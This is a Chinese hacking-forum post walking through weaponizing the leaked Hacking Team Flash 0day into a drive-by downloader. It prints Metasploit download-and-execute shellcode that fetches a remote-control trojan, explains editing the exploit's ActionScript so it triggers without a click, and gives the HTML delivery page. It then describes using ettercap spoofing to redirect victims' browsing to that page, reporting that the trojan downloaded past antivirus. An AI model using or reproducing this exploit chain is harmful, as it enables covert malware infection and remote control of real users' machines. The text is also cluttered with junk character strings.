中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

; L7 |8 h# w8 I; m8 W- P. K S 三、flash 0day之手工代码修改制作下载者实例入侵演示 ; Y+ Z. z) Q4 d6 ^' G1 Q

: X5 x9 v4 _. m3 Q0 f. W2 ^

: t- \8 }! @7 s' v 利用到的工具: , D- O$ Y7 A7 n

1 Y8 w- T: z* _. ^8 }: _

3 E$ g5 `' q! I6 d& ~: m Msf , [% G) i( R& T* q- D

) T3 `+ p) a) k% |

" t4 T- F4 [, |) ]: M! w Ettercap 5 Z& D9 @2 V6 ~1 h+ i( @

: W! K' d# _0 K( o% S# N5 B

3 ?( w/ o- U+ j4 b- }. g g& M, d+ _ Adobe Flash CS6 ! Q2 |5 E1 M$ S0 ]& o

, ]- ^$ N/ q" T" M0 b

. J( v6 }1 z1 G* j, H Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 # {1 ^& L8 g8 n7 w4 G9 J

2 E' D% o% I! Q) g

+ k& ^3 Z ^- S0 G% Z, P! K- r 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ' `( |9 m8 |; o7 r. p4 |, s. K) F) n

( {; |: W9 r+ N+ M# S

- V8 x8 W& @$ x 如图: ! S9 e( v" E" d- C& o) C4 X1 m

, j# U' a/ m1 P

# r, y \9 x+ o   & \' Q+ Z& A0 ~6 ?

' a" s8 C& f1 a1 t% }, _) {, U

* G7 e8 L5 _- f( k) A. j2 t& J5 O3 c5 D   $ b: w3 h$ j5 l1 y3 J! N

* G) `# `6 L$ t0 X

+ h/ K4 _, H x$ c$ w) d 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 X( n+ g* I2 b. ~$ j

4 ^% z8 B7 b3 t

. [& I7 }3 W; i/ l9 H! m# B   1 A& z0 p) {7 H- J% k9 A- Z

8 h* Y0 T& z. f: e- D7 F7 [

& e4 M2 d+ W0 E   # F& x- ?5 I$ s" C% p

% e0 ~( N0 [. E/ L

2 k- m5 T4 d$ P5 V* O 然后执行generate -t dword生成shellcode,如下: 8 K' z7 O& g; g. N! O3 q* p+ r. |) Z

+ @& |0 F7 A5 S

% J0 J+ A x: u. G3 ~# ]" u. w   Q2 D# j! H, x" ^

# x- r r! D9 s0 `3 ~

# I* N. d. }* R I' o6 k( s+ c 复制代码到文本下便于我们一会编辑flash exp,如下: ' _) c4 U) Q4 e- g) `% U9 R" v

+ n' R3 n5 q) B8 J4 A

7 H0 X; ~# ^8 `( K( l2 H# z/ ~ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 `, b7 D, E; d' D0 J8 v6 `

( W9 z# I/ A0 h/ b0 E- U$ O" m5 c

; j6 H- h/ o5 n' D: W3 v 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ }+ J- u1 [4 W# M- g4 Z7 ?

! F$ F K! W+ F" S$ S' R1 Z7 ?& E+ S

2 K( H3 r$ L3 I9 m5 _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + |: W3 l* _9 A! Q) N8 A

& Z3 l; E- u7 C# K5 |

3 P0 F Z4 ~- ^ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 5 ]7 }- i" S% c; u$ T$ q0 I3 E

Q2 c! l* O3 Z2 G. s1 E, T

* ?* z/ M6 }2 x 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0 ]+ E7 O5 U$ H2 }3 C' z* y

8 I8 W+ ]2 O6 Z5 ]' U

- i" @' i9 k; m) r- h$ v; ` 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 9 ^0 N' v6 r" c& R: W9 f

) e! X. x0 P6 d$ k

2 ~$ U$ N2 t j, @& @# c 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 ?7 P8 a7 T. H! U$ Q1 k

: y8 R- A1 L7 X( n6 @9 }

) [/ J$ j& H- w. G1 J% N3 J 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " W; s( A- R& t( E! V) u

4 `( @3 {( ?% m( _

$ P0 j$ Y" A1 S 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, : R/ S( B) w) I

( q [( n; G% W

/ d, c p" N& L0 p2 i8 ?% ] 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # G/ p$ b) {% v: o) P% H8 D( `. \+ W

7 T5 y8 `7 r& ?4 L" V( g- m

5 w4 J! {; P4 x+ s. [ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - \- T* N- ^8 D0 \9 Y

* Z' N( j0 M$ g

: T+ w$ |8 s! {( f/ i 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, B7 N4 b. ?# O; M4 E6 O

6 T0 G. Q& J. f( Q

1 n( p" s# h; p$ a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ! N9 Z" G% X* M6 d( N5 E/ v H) Q

1 V7 y& Y! K( q2 A) |. @2 S: \

* ^' Z5 x$ U! g; I' C- e6 f: k 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 & v( J) S$ U J' B" Q# W; S! e

8 M, [8 a: ~7 z! y8 a- _

6 }/ V( l# k; r6 J) E   % J8 w3 ?* x4 s V0 j

8 t! S) x2 M7 }

3 @$ w8 U, B9 `: [7 H" ~; ?4 {   : a; [/ h0 N6 k0 U: l6 P: f L

|6 P" D& O+ u. W& y5 S5 l

1 [; t' B/ X7 [ 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ' g3 t2 _1 L3 ?5 c2 e, [$ ]

% `( ~5 ?* M% A1 @; \- M

8 ~0 p0 l, G3 Q! A6 B1 G   ) k. t$ r: h0 y8 n5 w4 M/ B

: l' l& R+ p- p0 X1 B( F

* e: N' q, i' y" j 先修改ShellWin32.as,部分源代码如图: ) }5 ?- Z; D/ k" Q

: @, Z0 ^6 p: F7 [' F _% h

# |6 K: }1 y/ e2 {$ c- m   , t5 L- U1 N% o, B" P) r+ G5 J

1 @1 w# B6 G% I# |+ u

' e3 d+ D P: O" n9 L4 \% _0 z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; Y& B$ [4 m, S( {* N2 e

+ P& B$ Y( F% I. H: V! \

4 }( \, H* C0 o2 n1 n& e   ! o& X# A' L2 p

8 ?9 H+ ?$ j. F* C' s. N( E' Y) i

5 s: N* T$ m; M) Q( K/ ~) Y 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ) C3 L% O$ t& [" J4 z- U, d+ m( e* o

' b' b; Y, V5 i- c' r5 {) v2 M

5 h$ x" G: }+ @7 W8 n; V   4 T9 N9 ^8 y1 B

! ]& P/ L. p1 [: R' x

! E$ P P3 L! Z5 Y. N7 u' B 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: % s- x/ `3 `6 O! F7 h

# p1 [, x! ~" J

: F' n! O" X; H- y1 g   ! g- D# Z8 U9 F6 z& v$ o$ n4 F7 n

: z& J2 f7 F/ t

( F- j# c( c! ~' @6 O& F   2 X' X/ i6 W' t

# q) T( B/ N* O2 B

! _" y& t, H1 w' P, k   2 u) i; ?/ o6 o9 a1 ?) W- O8 ~

! h9 ~9 }3 f8 L- a

% w7 t8 t1 u, g5 N l 然后点保存,下面我们来编译一下,打开 ' v/ S9 f2 Y5 U# Q1 Q% n* \

: [) j7 U6 m: n0 f

5 L# q$ n. {5 i exp1.fla然后点文件-发布,看看编译没错误 * | R p5 X5 G7 `5 u, C; N

6 X) t% y/ T6 C9 g. g

* \3 |8 ^1 w; f; l% y) y   $ D) o) N' l/ L

+ Q0 `, z9 m% n1 ]+ N

J( M/ y1 J/ c& d3 t+ t: m( ~   ; G/ y6 N- y" T$ n9 F

7 i& x& a/ V# J1 L; ?9 E p

( U& ?1 H% Y& B) Q   ! a5 p4 z2 o5 S0 s8 r

" J/ N/ h( X: Q" Y. p O

- [3 ]8 @) x) Q# y   " C1 h' k( |! }( r

$ l9 D' \5 B% y9 I

+ S6 z+ A8 g7 G) g/ v% \7 q 然后我们把生成的 ( [3 g. J% ^. X

1 I8 J8 i; h( e' e

7 b6 S) t# d8 ]# A$ ~6 M; z3 Z8 {1 j exp1.swf丢到kailinux /var/www/html下: 7 G R5 V' r1 {5 w

) Q* x8 F5 e) a

: p/ H& K0 c" F" I 然后把这段代码好好编辑一下 ) X7 J0 J9 D5 [

2 d. B! G2 |1 w9 ?, x+ V3 @: S

* k& \: T( L% Q" z; d4 F- Y) F   & B( U' L2 R" B( W* C, B% @

* |0 l, J6 j* }9 ^; H

( O. v: Z5 H6 h- k N   8 F' ~7 j" c( R) T s I

" n6 K8 [' y8 ]2 y2 _/ |# {

" K* D; G u* ?' w0 A   * h9 W4 x" o; _- Z/ t/ M

5 d8 A# ?: }$ {5 V# d

; ]& s- m7 {# C7 Z9 I   $ `5 V0 ?- ?3 ?0 A8 w

$ }' S* }1 V1 ` g/ N+ ]

0 R6 j0 t( u, `' K/ \( l& K$ i   ( a% m' u8 S# ^2 V3 B7 ]8 Q3 }

% y5 ]& T+ W; _2 l9 k4 O `

4 |$ q4 e, o0 V) s   4 p; W: y) p' v8 K

3 `9 N( F* _7 y4 ~7 o( Y2 d7 U

4 U6 Q0 J0 ~6 q3 E' D <!DOCTYPE html> 3 C) I: }( p, E

. j, f' C6 w; d

# S- T/ C& n0 q <html> % x7 w- f& s3 }: @5 z2 d* T

/ K, n: X( B; g o9 C d" {# s8 P

. @! ]- o2 P" J. e <head> 3 S& i' \. `6 G8 C4 s0 z

: C! K ]3 \8 j# v. A( s

! X( m' [1 s8 F2 b <meta http-equiv="Content-Type" content="text/html; 5 w1 A# L. u3 V6 A2 }

1 R$ b, u( j" x: Y) c$ \/ T7 D3 K

+ k8 \: Q% k; d! u, A charset=utf-8"/> 1 _: b( W- ]* s$ a$ i* S

" x' `6 v; r% M" k7 {1 y+ M/ X

$ H/ [& u$ k; c3 W </head> , `" l7 l3 }! e4 l7 ], L

, ?, ?6 n, t9 H; m3 q" t

6 r; W! u8 z/ O7 x$ _4 ] <body> 6 w, B! o/ C8 m/ b+ ]4 \; A

4 A2 U* D6 ]* T$ w

- G8 `( x+ ^- \) E1 l0 _" b$ n <h2> Please wait, the requested page is loading...</h2> 4 Z) S2 g. X8 j1 _7 f- ]

; P/ ^& g7 E. U' w4 q6 Q5 H

! b, X& }3 @( e <br> $ h" ]* `1 Q; U5 L5 |- @2 }

/ a! `# o8 X. R% k

2 e, [/ O2 u2 i. M# E <OBJECT ) I- t3 a8 n" F; I; C. E

% X' |% k2 Z3 x* ]9 S

; H6 b! R) T( d# g classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 2 \; h( t- n) |' v

3 r( X' e R# e( O9 k; @

( ]% q# z/ R) F VALUE="http://192.168.0.109/exp1.swf"></OBJECT> , U9 t; @$ B" {0 r% {2 Y4 a, X

7 e- M" D. F9 }, J3 ]# z% M6 b

7 P' w& b E8 |& ?% M: O8 m B </body> ) p; j+ \7 @; H

+ z; L4 E/ I1 Q# x

6 H$ G4 z# z- |7 n9 H" I8 |- T <script> 7 e" u- F/ U6 T# v

0 n5 a& U! t* M+ r4 u+ V- \4 s. h

; ]2 @8 A6 G4 d# f( }% G     setTimeout(function () { # ~/ R6 L4 u' z, P$ Z

' y& C* r. ]: s. E0 B

' }0 P$ s: r4 r, Q5 }4 m          9 s8 `) O+ u% x; w0 y9 z; J

1 G& L5 ?& _9 }& P% ?+ F3 y, a9 I

! f: r8 t" p, K3 T% q window.location.reload(); 1 N- f3 s4 P$ V: C( b

# m3 X" Y$ d, ~! c& s2 Q% _- c5 g

2 a8 F- Z" h8 p( \ Z2 P     }, 10000); 2 y% Q) F ~; q

. q3 c5 u# ]2 X- t. E. ~

3 f& ^, s# N) j: {   . z0 i. K' L1 ?

( F4 D( A+ o8 h) Z1 R2 q

- e* w& w+ I( n4 s& a </script> + [- D3 g$ J( s- e1 j1 C6 v

! v; X8 P" ^$ m! Z9 {

) W/ Z0 }5 ^% _ </html> & t; |& T+ x" B# I" _. v2 [2 l) i

. |' E" }# t8 \( G( w( O3 z

! W3 K6 I- Y! h6 ]. ^   ) `0 R* E+ C0 F4 J

. e% E" |8 q9 M2 v" l% J

& I% f- U: Z. n) R( a! _ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 0 s. {3 S, G N& s! V8 {% }

& d, D) J1 O! o X

% h/ P) O! h0 N# @* Z0 e   ; R) b; |" o. P" V1 v8 e, w. p

; o0 D: x( Y7 L( q8 u: Z; t4 o

) I+ \! A. N( s0 O' P   ' U8 j* s v. D5 U

# u: Q# ?9 [; x# g/ _

2 Y% ], I6 d( c4 J* r   ; o& V% Z3 U% V

y, G7 W5 |" L% J5 v

+ X! x- y# q: e1 b# w, g: g) B$ _   ) ]' a# Z( j1 C6 L, i

9 z# h) ]8 i ?/ P1 M) U, {

. ]# D6 J0 _. T1 o! P: u P   * H- G( P: x2 ]' {" F

& E0 C( i' x. |7 K

( d" N+ ~5 O0 `% N6 A2 e 下面我们用ettercap欺骗如图: . h" _) h6 o/ b6 m/ N

+ [. g% d( z% V) w1 Y& H& o. h/ O

" |; M5 g+ F+ H \, x# P   $ j8 y" `4 }0 B

2 h3 B K, ]5 Z

6 y n R% u; l8 t- |   - b& X& S8 `+ i2 b* ~+ t2 A7 I

9 F* _$ Y5 k4 ]- C4 `6 ]: _

5 D6 v' u: @/ g9 ~' f 下面我们随便访问个网站看看: ' e0 f! b% _- m9 |# Q7 D

+ U8 U$ L4 T( d9 h3 d0 k

. E+ N3 k" N! j! p7 U 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 ^4 @$ j* }$ T6 B4 t

' {; C" H! v2 q9 O' G& N

& @: Q5 {1 {) @3 x   ' v& O0 i! b: q6 u# u

+ u3 e5 Q' u4 @$ g; P, Q

% h$ r0 m* P, `) V 我们看另一台, - W9 U) V# Q, \

, `4 I3 x3 ~5 i% P- N: a" f/ B! v

3 Z0 H, q$ d0 n( q, k 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ; v9 {5 [$ s) ^0 E( E0 \( b4 q






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2